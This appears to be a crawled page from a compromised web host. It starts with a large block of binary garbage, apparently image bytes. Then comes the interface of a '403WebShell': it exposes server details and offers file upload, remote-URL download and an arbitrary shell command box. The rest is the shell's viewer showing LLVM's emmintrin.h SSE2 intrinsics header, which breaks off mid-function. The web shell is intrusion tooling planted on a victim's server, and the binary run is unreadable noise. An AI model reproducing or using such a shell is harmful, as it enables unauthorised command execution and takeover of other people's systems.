�����u�����񶤑Oqˎ�T����r��㠚x�sr�GC��byp�G��1ߠ�w e�8�$⿄����/�M{*}��W�]˷.�CK\�ުx���/$�WP w���r�
|i���&�}�{�X�
�>��$-��l���?-z���g����lΆ���(F���h�vS*���b���߲ڡn,|)mrH[���a�3�ר�[1��3o_�U�3�TC�$��(�=�)0�kgP���� ��u�^=��4 �WYCҸ:��vQ�ר�X�à��tk�m,�t*��^�,�}D*� �"(�I��9R����>`�`��[~Q]�#af��i6l��8���6�:,s�s�N6�j"�A4���IuQ��6E,�GnH��zS�HO�uk�5$�I�4��ؤ�Q9�@��C����wp �BGv[]�u�Ov��� 0I4���\��y�����Q�Ѹ��~>Z��8�T��a��q�ޣ;z��a���/��S��I:�ܫ_�|������>=Z����8:�S��U�I�J��"IY���8%b8���H��:�QO�6�;7�I�S��J��ҌAά3��>c���E+&jf$eC+�z�;��V������r���ʺ������my�e���aQ�f&��6�ND ��.:��NT�vm�<-
u���ǝ\MvZY�N�NT��-A�>jr!S��n�O1�3�Ns�%�3D@���`������ܟ1�^c<�����a�ɽ�̲�Xë#�w�|y�cW�=�<ITS�1�G]�b��I&�"B#E,�N` �l¡/'Pi��Ey�I���h���H�YH�A͑|4Z�A�����Q��>9I*H8�p�^(4���՗�k��arOcW�tO�\�ƍR��8����'�K���I�Q�����?5�>[�}��yU�ײ-h��=��%	q�ThG�2�)���"ו3]�!kB��*p�FDl�A���,�eEi�H�f�Ps�����5�H:�Փ~�H�0Dت�D�I����h�F3�������c��2���E��9�H��5�zԑ�ʚ�i�X�=:m�xg�hd(�v����׊�9iS��O��d@0ڽ���:�p�5�h-��t�&���X�q�ӕ,��ie�|���7A�2���O%P��E��htj��Y1��w�Ѓ!����	����	ࢽ��My�7�\�a�@�ţ�J �4�Ȼ�F�@o�̒<D�Xw���j}�G}9���j{C�<F2�?!x� <�x�=
�K#jU��k��3sr�4�*�\3���T�s�#�Eu y�I���{���F'��_�f����.���c|�TP���z�~�%6���`�v����e*wD�O�˞ᐌN�E�u�|̧hj����G: ��m{�<��SL�xS��4�(��Օ� ���#�t�gS�W�6�*E�:E�QSá|�"�W_$����G���D�}�N~�wQME�c�؁����մs��s�\I�hU��#m� oJ��.�J�٭J��I�Z؂R�`C��Bۇ]�^Y;Tѓ/.^�4�� 5�" ����ӭ�ҟ4��G ����І���jh�{l�oo�]N���a�+�ygm�.dY�!-W����աFnL��
>?4�wx��)��]�P��~�����u�����5�����7X��9��^ܩ�U;Iꭆ
5�������eK2�7(�{|��Y׎�V��\"���Z�1�
Z�����}��(�Ǝ"�1S���_�vE30>���p;�ΝD��%x�W�?W?v����o�^V�i�d��r[��/&>�~`�9Wh��y�;���R�� �;;ɮT��?����r$�g1�K����A��C��c��K��l:�'��3c�ﳯ*"t8�~l��)���m��+U,z��`( �>yJ�?����h>��]��v��ЍG*�{`��;y]��I�T�;c��NU�fo¾h���/$���|NS���1�S�"�H��V���T���4��uhǜ�]�v;���5�͠x��'C\�SBpl���h}�N����� A�Bx���%��ޭ�l��/����T��w�ʽ]D�=����K����r㻠l4�S�O?=�k
�M:���c�C�a�#ha���)�ѐxc�s���gP�iG�� {+���x���Q���I=	��z��ԫ+
�8"�k�ñ�j=|����c��y��CF��/ ��*9ж�h{�?4�o���k�m�Q�N�x��;�Y��4膚�a�w?�6�> e]�����Q�r�:����g�,i"�����ԩA� *M�<�G��b�if��l^M��5� �Ҩ�{����6J��ZJ�����P�*�����Y���ݛu�_4�9�I8�7���������,^ToR���m4�H��?�N�S�ѕw��/S��甍�@�9H�S�T��t�ƻ���ʒU��*{Xs�@����f��� ��֒Li�K{H�w^���������Ϥm�tq���s�
���ք��f:��o~s��g�r��ט�
�S�ѱC�e]�x���a��) ���(b-$(�j>�7q�B?ӕ�F��h<y�ci M�����Jc�����z�Nݝ:�ΧX����&]�+�\�T�F�4���@�+���ןO�׵���?�s�q8���(Y��Ʊ���*�RM��g�Ow0=g`��ښ�=�� 9���#�������o��m�r?���G񶨯�ǘ8��N�t1�%��<찘��5��?*�C�9�v����:�9��9?[�}~����a���)e�G+Ü�t(�N��JFm��e��[��P1'`�h% 4ﶹ�p�m�<��g=�۹��aa��x>V25r[7
Y�}L�R��}����*sg+��x�r�2�U=�*'WS��ZDW]�WǞ�<��叓���{�$�9Ou4��y�90-�1�'*D`�c�^o?(�9��u���ݐ��'PI&�f�Jݮ�������:wS����jfP1F:X�H�9dԯ�� �˝[�_54�}*;@�ܨ��	ð�yn�T���?�ןd�#���4rG�ͨ��H�1�|-#���Mr�S3��G�3�����)�.᧏3v�z֑��r����$G"�`j�1t��x0<Ɔ�Wh6�y�6��,œ�Ga��gA����y��b��)� �h�D��ß�_�m��ü�gG;��e�v��ݝ�nQ���C����-�*��o���y�a��M��I�>�<���]obD��"�:���G�A��-\%LT�8���c�)��+y76���o�Q�#*{�(F�⽕�y����=���rW�\p<yۚQ��bz�To����}��TT�Qqs�,s�vm盭��]���	����l�A�q�T<4p�p�b��U��Q�}�Y@�uZH��0n�����~�b|U�9/-�y#��@�7��]gxZ�Ո�ʟ�a���q�cÜ���M�r�u�r��#'PŻiՑ���o9���Y�����1;�s�����װ��/M"�3��hnt�T`UO��Xz�c�3�g��Cn"���m�e?�B�����9T�����ZW.�Y&�*GK�F��ݥz��q	�����ܧ�TNh#f�D���ᰎn�����}�fQ������69���ZL�C{�/P�̪(@a�[�11��^��J�F5s��T�ֺB��W�~= ���X��.�������_#����*�v�9�*֕�N�;AÛ�5f`pi5n�Ֆb������:�m���ĦiV?�.j,�C��-"��1��D)���`Ѭى,�jI9�ʈ����P����6��$u{�J��w��n4�Dm�m���y��}]���h�)ɹ#R#�΢ن���TZ���k�	����h(xe�G/�������EA��fQBA���?x���bk�T-���y4Ƈy��ИQ���4�3yk�Z&&�x�N�?Y}�.��{lt��u����psm}Cfs�iY�v��/�ZH*1XG�8��GF��u�SZ�#�{&#JȺ[H���su�^53�	��ݜf f讥]`��m���}h�=Xo,a����Ѣ�*����×^KJ1H~-�;,��Ƥ�d���D��B=ƥ����ue�(�D�ӈF��%N5����f��8��6>���۩�c���A���^e6��K������ʐ�cVf5$�'->���ՉN"���F�"�UQ@�f��G<GZ6p�5�(tW3~�!�$�U��#�'���¿���[!���17���;OP�&)��F/w9� )�qn`��y��4��X(�c�m^X)�46� |l0 ̵����ג�����P���`�.Ԛ��7 ��Ẻ����( �D���ȃ&=���ڍ]�����Q�cՏ�ϴ���4���66q��+ԩ�e@�WYb����M�@�`( ���eaP��Z�Y�N}��֧�:z$��K1�I��������=јu�跄),n0`�}���^H���ӯ?C�:@��ED��NŨ;I�]E��/�9^Z��.?��JG� p9�����:�U��c�@ �mxJG�hΏ�t�k��FfS���a��V?F�*�\{-�է8�Q��_�5�tOnyUY6&�}%Ex�,ª�j�rj-��Y���~��"�g�U���X���Y��ԯE��3Tm�� I:�NU���Qw���C�ߛ�L(�H��u���d�]Ǽ����4���G�S���Y�&n[$�A����2L��`6>b~��#�&�M=��8�ט�JNu9��D��[̤�s�o�~��� ���G��9T�tW^g5y$b��Y'��س�Ǵ�=��U-2	#�MC�t(�i�	�ǉ�@Q
5�̣i�*�O����s�x�K�f��}\��M{E�V�{�υ��Ƈ�����);�H����I��fe�Lȣr�2��>��W� I�Ȃ6������i��k���5�YOxȺ����>��Y�f5'��|��H+��98pj�n�.O�y�������jY��~��i�w'������l�;�s�2��Y��:'lg�ꥴ)o#'Sa�a�K��Z��m��}�`169�n���"���x��I ��*+�	}F<��cГ���F�P�������ֹ*�PqX�x۩��,�	��N��
�4<-����%����:��7����W���u�`����� $�?�I��&����o��o��`v�>��P��"��l���4��5'�Z�gE���8���?��[�X�7(��.Q�-��*���ތL@̲����v��.5���[��=�t\+�CNܛ��,g�SQnH����}*F�G16���&:�t��4ُ"A��̣��$�b �|����#rs��a�����T��]�<�j��B S�('$�ɻ�
�wP;�/�n��?�ݜ��x�F��yUn�~mL*-�������Xf�wd^�a�}��f�,=t�׵i�.2/wpN�Ep8�OР�����R�FJ�	
55TZ��T�ɭ�<��]��/�0�r�@�f��V��V����Nz�G��^���7hZi����k��3�,kN�e|�vg�1{9]_i��X5y7�8e]�U����'�-2,���e"����]ot�I��Y_��n�(JҼ��1�O]bXc���Nu�No��pS���Q_���_�?i�~�x h5d'�(qw52]	��'ޤ�q��o1�R!���`ywy�A4u���h<קy���\[~�4�\ X�Wt/�	6�����n�F�a8��f���z�3$�t(���q��q�x��^�XWeN'p<-v�!�{�(>ӽDP7��ո0�y)�e$ٕv�Ih'Q�EA�m*�H��RI��=:������4牢) �%_iN�ݧ�l]�	�Nt���G��H�L���ɱ�g<���1V�,�J~�ٹ�"K��Q�� 9�HS�9�?@��k����r�;we݁�]I�!{�@�G�[�"��`���J:�n]�{�cA�E����V��ʆ���#��U9�6����j�#Y�m\��q�e4h�B�7��C�������d<�?J����1g:ٳ���=Y���D�p�ц�׈ǔ��1�]26؜oS�'��9�V�FVu�P�h�9�xc�oq�X��p�o�5��Ա5$�9W�V(�[Ak�aY錎qf;�'�[�|���b�6�Ck��)��#a#a˙��8���=äh�4��2��C��4tm^ �n'c� ��]GQ$[Wҿ��i���vN�{Fu��1�gx��1┷���N�m��{j-,��x��Ūm�ЧS�[�s���Gna���䑴��x�p8<������97�Q���ϴ�v�aϚG��Rt�Һ׈�f^\r��WH�JU�7Z���y)�vg=����n��4�_)y��D'y�6�]�c�5̪ �\�
�PF�k����&�c;��cq�$~T�7j���nç]�<�g	":�to�t}�159�<�/�8������m�b�K#g'I'.W����� 6��I/��>v��\�MN��g���m�A�yQL�4u�ǈ�j9��#44�t��l^�}L����n��R��!��t��±]��r��h6ٍ>�yҏ�N��fU��	����Fm@�8}�/u��jb9������he:A�y�ծw��GpΧh�5����l}�3p468��)U��d��c����;Us/�֔�YX�1�O2��uq�s��`hwg�r~�{R��mhN��؎*q42�*th��>�#���E����#��Hv�O����q�}����� 6�e��\�,Wk�#���X��b>��p}�դ��3���T5����6��[��@ �P�y*n��|'f�֧>�lư΂�̺����SU�'*�q�p�_S�����M��	'��c�6��� ��m��ySʨ;M��r���Ƌ�m�Kxo,���Gm�P��A�G�:��i��w�9�}M(�^�V��$ǒ�ѽ�9���|���� �a����J�SQ�a���r�B;����}���ٻ֢�2�%U���c�#�g���N�a�ݕ�'�v�[�OY'��3L�3�;,p�]@�S��{ls��X�'���c�jw� k'a�.��}�}&���dP�*�bK=ɍ!����;3n�gΊU�ߴmt�'*{,=SzfD�A��ko~�G�aoq�_mi}#�m�������P�Xhύ��� �mxǍ�΂���巿zf��Q���c���|kc�����?���W��Y�$���_Lv����l߶��c���`?����l�j�ݲˏ!V��6����U�Ђ(A���4y)H���p�Z_�x��>���e�� R��$�/�`^'3qˏ�-&Q�=?��CFVR
�D�fV�9��{�8g�������n�h�(P"��6�[�D���<E�����~0<@�`�G�6����Hг�cc���c�K.5��D��d�B���`?�XQ��2��ٿyqo&+�1^�DW�0�ꊩ���G�#��Q�nL3��c���������/��x
��1�1 [y�x�პCW��C�c�UĨ80�m�e�4.{�m��u���I=��f�����0QRls9���f���������9���~f�����Ǩ��a�"@�8���ȁ�Q����#c�ic������G��$���G���r/$W�(��W���V�"��m�7�[m�A�m����bo��D�j����۳�l���^�k�h׽�������#�iXn�v��eT�k�a�^Y�4�BN�� ĕ�� 0        !01@Q"2AaPq3BR������ ? � ��@4�Q�����T3,���㺠�W�[=JK�Ϟ���2�r^7��vc�:�9�E�ߴ�w�S#d���Ix��u��:��Hp��9E!��
V2;73|F��9Y���*ʬ�F��D����u&���y؟��^EA��A��(ɩ���^��GV:ݜDy�`��Jr29ܾ�㝉��[���E;Fzx��YG��U�e�Y�C����	����v-tx����I�sם�Ę�q��Eb�+P\	:>�i�C'�;�����k|z�رn�y]�#ǿb��Q��������w�����(�r|ӹs��[�D��2v-%��@;�8<a���[\o[ϧw��I!��*0�krs)�[�J9^��ʜ��p1)�	"��/_>��o��<1����A�E�y^�C��`�x1'ܣn�p��s`l���fQ��):�l����b>�Me�jH^?�kl3(�z:���1K&?Q�~�{�ٺ�h�y���/�[��V�|6��}�KbX����mn[-��7�5q�94�������dm���c^���h�X��5��<�eޘ>G���-�}�دB�ޟ�
��|�rt�M��V+�]�c?�-#ڛ��^ǂ}���Lkr���O��u�>�-D�ry�D?:ޞ�U��ǜ�7�V��?瓮�"�#���r��չģVR;�n���/_�؉v�ݶe5d�b9��/O��009�G���5n�W����JpA�*�r9�>�1��.[t���s�F���nQ�
V77R�]�ɫ8����_0<՜�IF�u(v��4��F�k�3��E)��N:��yڮe��P�`�1}�$WS��J�SQ�N�j �ٺ��޵�#l���ј(�5=��5�lǏmoW�v-�1����v,W�mn��߀$x�<����v�j(����c]��@#��1������Ǔ���o'��u+����;G�#�޸��v-lη��/(`i⣍Pm^� ��ԯ̾9Z��F��������n��1�����]�[��)�'������ :�֪�W��FC�����	�B9،!?���]��V��A�Վ�M��b�w��G
F>_DȬ0¤�#�QR�[V��kz���m�w�"��9ZG�7'[��=�Q����j8R?�zf�\a�=��O�U����*oB�A�|G���2�54�p��.w7���
 ��&������ξxGHp�B%��$g�����t�Џ򤵍z���HN�u�Я�-�'4��0�� ;_�� 3        !01"@AQa2Pq#3BR������ ? � �ʩca��en��^��8���<�u#��m*08r��y�N"�<�Ѳ0��@\�p���	�����Kv�D��J8�Fҽ�
�f�Y��-m�ybX�NP����}�!*8t(�OqѢ��Q�wW�K��ZD��Δ^e��!� ��B�K��p~�����e*l}z#9ң�k���q#�Ft�o��S�R����-�w�!�S���Ӥß|M�l޶V��!eˈ�8Y���c�ЮM2��tk����������J�fS����Ö*i/2�����n]�k�\���|4yX�8��U�P.���Ы[���l��@"�t�<������5�lF���vU�����W��W��;�b�cД^6[#7@vU�xgZv��F�6��Q,K�v��� �+Ъ��n��Ǣ��Ft���8��0��c�@�!�Zq
s�v�t�;#](B��-�nῃ~���3g������5�J�%���O������n�kB�ĺ�.r��+���#�N$?�q�/�s�6��p��a����a��J/��M�8��6�ܰ"�*������ɗud"\w���aT(����[��F��U՛����RT�b���n�*��6���O��SJ�.�ĳ<�v�MT��R\c��5l�sZB>F��<7�;EA��{��E���Ö��1U/�#��d1�a�n.1ě����0�ʾR�h��|�R��Ao�3�m3��%�� ���28Q� ��y��φ���H�To�7�lW>����#i`�q���c����a����m,B�-j����݋�'mR1Ήt�>��V��p���s�0IbI�C.���1R�ea�����]H�6�������� ��4B>��o��](��$B���m�����a�!=� �?�B�
K�Ǿ+�Ծ"�n���K��*��+��[T#�{ E�J�S����Q�����s�5�:�U�\wĐ�f�3����܆&�)��� �I���Ԇw��E	T�lrTf6Q|R�h:��[K���z��c֧�G�C��%\��_�a �84��HcO�bi��ؖV��7H�)*ģK~Xhչ0��4?�0����E<���}3���#���u�?��
��|g�S�6ꊤ�|�I#Hڛ�	�ա��w�X��9��7���Ŀ%�SL��y6č��|�F�a8���b� �$�sק�h���b9RAu7�˨p�Č�_\*w��묦��F����4D~�f����|(�"m���NK��i�S�>�$d7SlA��/�²����SL��|6N�}���S�˯���g��]6��;�#�.��<���q'Q�1|KQ$�����񛩶"�$r�b:���N8�w@��8$���AjfG|~�9F���Y��ʺ��Bwؒ������M:I岎�G��`s�YV5����6��A �b:�W���G�q%l�����F��H���7�������Fsv7� �k��
<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>213.165.242.4</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.104</font><br>Web Server : <font color='#df5'>Apache</font><br>System : <font color='#df5'>Linux amsngx344.inmotionhosting.com 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64</font><br>User : <font color='#df5'>aquafi9&nbsp;</font>( <font color='#df5'>1305</font>)<br>PHP Version : <font color='#df5'>7.4.33</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=green>ON</font> &nbsp;|&nbsp; Pkexec : <font color=green>ON</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/lib">lib</a>/<a href="?loknya=/lib/clang">clang</a>/<a href="?loknya=/lib/clang/20">20</a>/<a href="?loknya=/lib/clang/20/include">include</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='red'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/squirt.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /lib/clang/20/include//emmintrin.h</tr></td></table><br/><pre>/*===---- emmintrin.h - SSE2 intrinsics ------------------------------------===
 *
 * Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
 * See https://llvm.org/LICENSE.txt for license information.
 * SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
 *
 *===-----------------------------------------------------------------------===
 */

#ifndef __EMMINTRIN_H
#define __EMMINTRIN_H

#if !defined(__i386__) &amp;&amp; !defined(__x86_64__)
#error &quot;This header is only meant to be used on x86 and x64 architecture&quot;
#endif

#include &lt;xmmintrin.h&gt;

typedef double __m128d __attribute__((__vector_size__(16), __aligned__(16)));
typedef long long __m128i __attribute__((__vector_size__(16), __aligned__(16)));

typedef double __m128d_u __attribute__((__vector_size__(16), __aligned__(1)));
typedef long long __m128i_u
    __attribute__((__vector_size__(16), __aligned__(1)));

/* Type defines.  */
typedef double __v2df __attribute__((__vector_size__(16)));
typedef long long __v2di __attribute__((__vector_size__(16)));
typedef short __v8hi __attribute__((__vector_size__(16)));
typedef char __v16qi __attribute__((__vector_size__(16)));

/* Unsigned types */
typedef unsigned long long __v2du __attribute__((__vector_size__(16)));
typedef unsigned short __v8hu __attribute__((__vector_size__(16)));
typedef unsigned char __v16qu __attribute__((__vector_size__(16)));

/* We need an explicitly signed variant for char. Note that this shouldn't
 * appear in the interface though. */
typedef signed char __v16qs __attribute__((__vector_size__(16)));

#ifdef __SSE2__
/* Both _Float16 and __bf16 require SSE2 being enabled. */
typedef _Float16 __v8hf __attribute__((__vector_size__(16), __aligned__(16)));
typedef _Float16 __m128h __attribute__((__vector_size__(16), __aligned__(16)));
typedef _Float16 __m128h_u __attribute__((__vector_size__(16), __aligned__(1)));

typedef __bf16 __v8bf __attribute__((__vector_size__(16), __aligned__(16)));
typedef __bf16 __m128bh __attribute__((__vector_size__(16), __aligned__(16)));
#endif

/* Define the default attributes for the functions in this file. */
#if defined(__EVEX512__) &amp;&amp; !defined(__AVX10_1_512__)
#define __DEFAULT_FN_ATTRS                                                     \
  __attribute__((__always_inline__, __nodebug__,                               \
                 __target__(&quot;sse2,no-evex512&quot;), __min_vector_width__(128)))
#else
#define __DEFAULT_FN_ATTRS                                                     \
  __attribute__((__always_inline__, __nodebug__, __target__(&quot;sse2&quot;),           \
                 __min_vector_width__(128)))
#endif

#if defined(__cplusplus) &amp;&amp; (__cplusplus &gt;= 201103L)
#define __DEFAULT_FN_ATTRS_CONSTEXPR __DEFAULT_FN_ATTRS constexpr
#else
#define __DEFAULT_FN_ATTRS_CONSTEXPR __DEFAULT_FN_ATTRS
#endif

#define __trunc64(x)                                                           \
  (__m64) __builtin_shufflevector((__v2di)(x), __extension__(__v2di){}, 0)
#define __anyext128(x)                                                         \
  (__m128i) __builtin_shufflevector((__v2si)(x), __extension__(__v2si){}, 0,   \
                                    1, -1, -1)

/// Adds lower double-precision values in both operands and returns the
///    sum in the lower 64 bits of the result. The upper 64 bits of the result
///    are copied from the upper double-precision value of the first operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VADDSD / ADDSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \returns A 128-bit vector of [2 x double] whose lower 64 bits contain the
///    sum of the lower 64 bits of both operands. The upper 64 bits are copied
///    from the upper 64 bits of the first source operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_add_sd(__m128d __a,
                                                                  __m128d __b) {
  __a[0] += __b[0];
  return __a;
}

/// Adds two 128-bit vectors of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VADDPD / ADDPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \returns A 128-bit vector of [2 x double] containing the sums of both
///    operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_add_pd(__m128d __a,
                                                                  __m128d __b) {
  return (__m128d)((__v2df)__a + (__v2df)__b);
}

/// Subtracts the lower double-precision value of the second operand
///    from the lower double-precision value of the first operand and returns
///    the difference in the lower 64 bits of the result. The upper 64 bits of
///    the result are copied from the upper double-precision value of the first
///    operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VSUBSD / SUBSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing the minuend.
/// \param __b
///    A 128-bit vector of [2 x double] containing the subtrahend.
/// \returns A 128-bit vector of [2 x double] whose lower 64 bits contain the
///    difference of the lower 64 bits of both operands. The upper 64 bits are
///    copied from the upper 64 bits of the first source operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_sub_sd(__m128d __a,
                                                                  __m128d __b) {
  __a[0] -= __b[0];
  return __a;
}

/// Subtracts two 128-bit vectors of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VSUBPD / SUBPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing the minuend.
/// \param __b
///    A 128-bit vector of [2 x double] containing the subtrahend.
/// \returns A 128-bit vector of [2 x double] containing the differences between
///    both operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_sub_pd(__m128d __a,
                                                                  __m128d __b) {
  return (__m128d)((__v2df)__a - (__v2df)__b);
}

/// Multiplies lower double-precision values in both operands and returns
///    the product in the lower 64 bits of the result. The upper 64 bits of the
///    result are copied from the upper double-precision value of the first
///    operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMULSD / MULSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \returns A 128-bit vector of [2 x double] whose lower 64 bits contain the
///    product of the lower 64 bits of both operands. The upper 64 bits are
///    copied from the upper 64 bits of the first source operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_mul_sd(__m128d __a,
                                                                  __m128d __b) {
  __a[0] *= __b[0];
  return __a;
}

/// Multiplies two 128-bit vectors of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMULPD / MULPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the operands.
/// \returns A 128-bit vector of [2 x double] containing the products of both
///    operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_mul_pd(__m128d __a,
                                                                  __m128d __b) {
  return (__m128d)((__v2df)__a * (__v2df)__b);
}

/// Divides the lower double-precision value of the first operand by the
///    lower double-precision value of the second operand and returns the
///    quotient in the lower 64 bits of the result. The upper 64 bits of the
///    result are copied from the upper double-precision value of the first
///    operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VDIVSD / DIVSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing the dividend.
/// \param __b
///    A 128-bit vector of [2 x double] containing divisor.
/// \returns A 128-bit vector of [2 x double] whose lower 64 bits contain the
///    quotient of the lower 64 bits of both operands. The upper 64 bits are
///    copied from the upper 64 bits of the first source operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_div_sd(__m128d __a,
                                                                  __m128d __b) {
  __a[0] /= __b[0];
  return __a;
}

/// Performs an element-by-element division of two 128-bit vectors of
///    [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VDIVPD / DIVPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing the dividend.
/// \param __b
///    A 128-bit vector of [2 x double] containing the divisor.
/// \returns A 128-bit vector of [2 x double] containing the quotients of both
///    operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_div_pd(__m128d __a,
                                                                  __m128d __b) {
  return (__m128d)((__v2df)__a / (__v2df)__b);
}

/// Calculates the square root of the lower double-precision value of
///    the second operand and returns it in the lower 64 bits of the result.
///    The upper 64 bits of the result are copied from the upper
///    double-precision value of the first operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VSQRTSD / SQRTSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the operands. The
///    upper 64 bits of this operand are copied to the upper 64 bits of the
///    result.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the operands. The
///    square root is calculated using the lower 64 bits of this operand.
/// \returns A 128-bit vector of [2 x double] whose lower 64 bits contain the
///    square root of the lower 64 bits of operand \a __b, and whose upper 64
///    bits are copied from the upper 64 bits of operand \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_sqrt_sd(__m128d __a,
                                                         __m128d __b) {
  __m128d __c = __builtin_ia32_sqrtsd((__v2df)__b);
  return __extension__(__m128d){__c[0], __a[1]};
}

/// Calculates the square root of the each of two values stored in a
///    128-bit vector of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VSQRTPD / SQRTPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector of [2 x double] containing the square roots of the
///    values in the operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_sqrt_pd(__m128d __a) {
  return __builtin_ia32_sqrtpd((__v2df)__a);
}

/// Compares lower 64-bit double-precision values of both operands, and
///    returns the lesser of the pair of values in the lower 64-bits of the
///    result. The upper 64 bits of the result are copied from the upper
///    double-precision value of the first operand.
///
///    If either value in a comparison is NaN, returns the value from \a __b.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMINSD / MINSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the operands. The
///    lower 64 bits of this operand are used in the comparison.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the operands. The
///    lower 64 bits of this operand are used in the comparison.
/// \returns A 128-bit vector of [2 x double] whose lower 64 bits contain the
///    minimum value between both operands. The upper 64 bits are copied from
///    the upper 64 bits of the first source operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_min_sd(__m128d __a,
